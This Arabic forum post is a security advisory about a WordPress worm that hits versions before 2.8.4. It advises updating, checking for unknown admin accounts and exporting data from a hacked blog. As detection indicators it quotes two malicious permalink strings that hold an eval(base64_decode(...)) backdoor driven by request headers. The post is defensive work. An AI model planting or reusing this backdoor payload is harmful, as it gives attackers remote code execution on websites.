للوقاية من الثغره:
1- تحديث update مدونتك الان, الإكسبلويت "0-d4y" يعمل على جميع إصدارات الوورد برس إلا 2.8.4 .
2- إصدار تقرير من الوورد برس :
كيفية الحفـــاظ على مدونتك امنة, بلإضافة الى معلومات حول
كيفية عمل تحديث update فوري لمدونتك لإيقاف هذه الإكسبلويت ( وورم ).
3- إذا كنت تستخدم إصدار وورد برس رقم 2.7 سوف يظهر لك عند دخولك لوحة التحكم تحذير لتحديث update مدونتك لأخر إصدار, وبحالة كنت تستخدم نسخة اقدم من 2.7 فوجب عليكم التحديق حالا, بحالة لم تستطع معرفة إصدار مدونتك,, وجب عليكم التحديث update عبر
الموقع الرسمي للورد برس من هنـــا حالا.
4- إستخدام إضافة وورد برس لحماية مدونتك: هذه الحالة ستكون إستثنائية لك بعد "تحديث updateك حاليا" لإصدار مدونتك, لاكن يوجد بعض الإضافات تساعدك بحماية مدونتك من التعليقات وغيرها من الامور المهمة,, لاكن بحالة عدم ترقية upgrade مدونتك, وجب عليكم الترقية upgrade الأن.
5- وورد برس غير أمن: برنامج وورد برس مامن بلحماية البرمجية والشكلية بنحو 97% من قبل خبيرين برمجة امنية للمواقع وتطويرات الويب, لاكن لايوجد برنامج على وجه الارض الا وتعرض للإختراق, وهذا الهجوم كان متوقع من قبل ! لاكن بإصدار وورد برس 2.8.4 تم ترقيعه بأمان ! وبحالة وجد او ظهر اي ثغره جديدة سواء خطيرة ام لا, ستقوم وورد برس بإعلام اعضائها على الترقيع بلحظات قليلة من قبل الخبرات بلتطوير والترقيع الامني المعد لها, حيث تملك وورد برس اكثر من 5,317,360 مليون مشترك بلعالم !
6- التخوف او الملل من التحديث update حالا: إن هذا التحديث update مطلوب من جميع اعضاء وورد برس, حيث ان هذه الثغره تعتبر قاتلة لمدونتك, فوجب عليكم الترقيع حالا وان لاتأجل الترقيع حتى وقت الإختراق ! ويفضل ايضا التاكد من تحديث update إضافات الوورد برس لديك "إن وجد تحديث update لها" حالا .
بحالة وجد تحديث updateات للوورد برس, فسيتم كتابة تحديث update للموضوع داخل موضوعنا هذا لمنتدى سيكيورتي رولز, وسيتم إبلاغ اعضائنا بنفس اللحظة.
* اللحين معظم الشباب ومالكين المواقع الي يستخدمون الوورد برس يتسالون عن مدوناتهم ؟ هل هي مخترقة او لا ؟
اولا: يتم الإختراق عن طريق ثغره ( برايفت ) يتم تحديث update معلومات العضو المسجل ( المخترق ) بحيث يصبح بمرتبه الأدمن ( المستهدف ) فللتاكد منها وجب عليكم الذهاب الى لوحة الأدمن, والتاكد من وجود عضويتك فقط ! فإن وجدت عضوية اخرى "تجهل صاحبها" فأنت مخترق ووجب عليكم إيقاف موقعك حالا, والافضل ان تغير مسار ملفاتك لمسار اخر "مؤقتا" والتاكد من نظافة ملفاتك من اي "كود code خبيث" او "شل كود code" بهم ,,وبعدها يقوم المخترق "بحالة عدم تاكدك او ترقيعك للمدوتة" بلولوج لمعلومات مهمة بموقعك مثل معلومات بريدك الإلكتروني إن كنت تحتفظ به بلمدونة blog, معلومات شخصية ومواضيع شخصية اخرى, ويمكنه ايضا من إختراق مدونتك بنفس اللحظة عن طريق رفع " شل كود code " لمدونتك والتحكم بلموقع كامل ! وإن كانت إستضافتك ذات حماية عادية او متوسطة, وذالك يعتمد على المخترق, فيتم إختراق سيرفر SERVERك كامل من هذه الثغره, فنتمنى التحديث update الفوري اللحين لمدونتك لحماية موقعك ومدونتك وسيرفر SERVERك ايضا !
ثانيا: التاكد من "روابط دائمة" مدونتك ! مثال
رمز PHP:
<code style="white-space:nowrap"> <code> %&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
</code> </code>
رمز PHP:
<code style="white-space:nowrap"> <code> 7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
</code> </code>
ثالثا: التاكد من عدم وجود "أدمن" إضافي بلوحة التحكم,, معظم الاوقات لإصدارات الوورد برس القديمة 2.7 واقدم ,, يوجد بعض الهاك productات "تخفي" الأعضاء سواء أدمن او يوزر,, فتستطيع من خلال الذهاب للوحة التحكم ومن ثم الأعضاء إختيار السورس كود code للصفحة والبحث فيها عن Administrator او Admin او user_ ,, فبحالة عدم وجود شي فإن شاء الله انت بامان,,,
بعد المرور بكل هذه التوضيحات ماتوقع بإذن الله وجود اي سؤال او إستفسار لحد من الشباب,, ولاكن لو وجد فإن شاء الله نحلها لكم,,, لاكن بحالة "لاسمح الله" تم إختراق مدونتكم, او العبث بلقاعدة (شي اكيد المخترق راح يقوم بلعبث بلقاعدة, او رفع شل او اي شي اخر يبقيه علموقع ( Backdoor ) له,,, فلحل الافضل والأمن لكم هو تحميل هذه الإضافة للورد برس
WordPress-to-WordPress Import WordPress Plugin ومن ثم عن طريقها ( بعد تثبيت setupها ) نقوم بإستخدام Export ( ضغط وتحميل ) معلومات مدونتنا من ( ردود - صور - ملفات - مواضيع ) كملف XML وحفظة بجهازنا , ومن ثم نقوم بتامين ( صور المدونة blog وملفاتنا إن وجدت ) وهذه المسارات عادة تكون داخل المدونة blog
رمز PHP:
<code style="white-space:nowrap"> <code> /home/username/public_html/wp-content/uploads
</code> </code>
رمز PHP:
<code style="white-space:nowrap"> <code> /home/username/public_html/images
</code> </code>